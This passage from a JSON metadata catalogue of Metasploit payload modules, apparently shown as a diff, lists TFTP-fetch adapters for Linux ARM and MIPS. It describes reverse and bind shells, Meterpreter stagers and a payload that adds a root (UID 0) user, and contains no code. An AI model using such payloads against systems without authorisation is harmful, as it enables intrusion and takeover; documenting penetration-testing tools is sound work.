"cmd/linux/tftp/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/shell_bind_tcp": { - "name": "TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Balazs Bucsay @xoreipeip " - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armle/adduser": { - "name": "TFTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/tftp/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/adduser", - "staged": false - }, - "payload_cmd/linux/tftp/armle/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/exec", - "staged": false - }, - "payload_cmd/linux/tftp/armle/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/tftp/armle/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/tftp/armle/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/armle/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/armle/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armle/shell/bind_tcp": { - "name": "TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/tftp/armle/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/tftp/armle/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ", - "hal" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armle/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mips64/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/mips64/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/mips64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/exec", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/reboot": { - "name": "TFTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/tftp/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/reboot", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsbe/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/exec", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_tcp": 